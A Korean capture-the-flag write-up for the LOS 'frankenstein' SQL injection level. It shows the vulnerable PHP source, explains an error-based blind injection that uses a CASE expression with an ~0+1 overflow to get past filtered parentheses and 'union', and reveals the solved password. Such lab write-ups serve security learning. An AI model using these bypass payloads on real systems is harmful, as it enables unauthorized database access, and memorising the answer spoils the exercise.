[LOS] frankenstein

$password = md5('Fr4nK3nsTe1N');공개

 

소스코드 분석

---

<?php     include "./config.php";   login_chk();   dbconnect();   if(preg_match('/prob|_|\.|\(|\)|union/i', $_GET[pw])) exit("No Hack ~_~");   $query = "select id,pw from prob_frankenstein where id='frankenstein' and pw='{$_GET[pw]}'";   echo "<hr>query : <strong>{$query}</strong><hr><br>";   $result = @mysql_fetch_array(mysql_query($query));   if(mysql_error()) exit("error");   $_GET[pw] = addslashes($_GET[pw]);   $query = "select pw from prob_frankenstein where id='admin' and pw='{$_GET[pw]}'";   $result = @mysql_fetch_array(mysql_query($query));   if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("frankenstein");   highlight_file(__FILE__); ?>

union과 '(', ')' 가 필터링 되어 있다. addslashes($_GET[pw])를 보아 pw에 대한 데이터는 존재한다. union을 통해 값을 우회하는 것은 아니다.

이번 문제는 쿼리를 요청하지만 결과를 페이지에 출력해주지 않는다. 다만 에러가 발생하면 error를 출력하고 종료한다.

문제 풀이

---

결과 값을 출력하지 않고, 쿼리를 출력하거나 "error"를 출력하거나 두 개의 선택지가 있다. 
쿼리에 대한 참과 거짓의 결과가 구분할 수 있으면 Blind SQLI를 시도할 수 있다. Blind SQLI를 하기 위해 쿼리의 참이나 거짓이나 둘 중 하나를 일부러 에러를 출력하도록 만든다.

에러를 발생시키는 방법은 여러가지가 있겠지만 풀이에선 ~0+1를 이용한다.

• SELECT ~0 => 18446744073709551615
• SELECT ~0 + 1 => ERROR

~0는 unsigned의 최댓값이 들어간다. 최댓값에 +1을 하여 에러를 출력하는 방식이다.  '(', ')' 를 필터링하지만 case를 필터링하고 있는 것은 아니기에 case를 통해 참이면 에러를 발생시키지 않는 값, 거짓이면 에러를 발생시키는 ~0+1를 출력하도록 아래의 쿼리로 요청한다.

query : select id,pw from prob_frankenstein where id='frankenstein' and pw='' || id > case when 1=1 then 0x123 else ~0+1 END-- -'

query : select id,pw from prob_frankenstein where id='frankenstein' and pw='' || id > case when 1=2 then 0x123 else ~0+1 END-- -'

참의 경우 다음과 같이 쿼리와 소스코드가 출력되지만 

거짓의 경우 error를 출력한다. 이렇게 error를 통해 강제로 blind SQLI 환경을 만들어준다.

'(', ')'를 사용할 수 없으므로 length, mid, substr, ascii 등 함수를 사용할 수 없다. red_dragon에서 사용했던 방법으로 부등호와 16진수를 통해 쉽게 알아낼수 있다.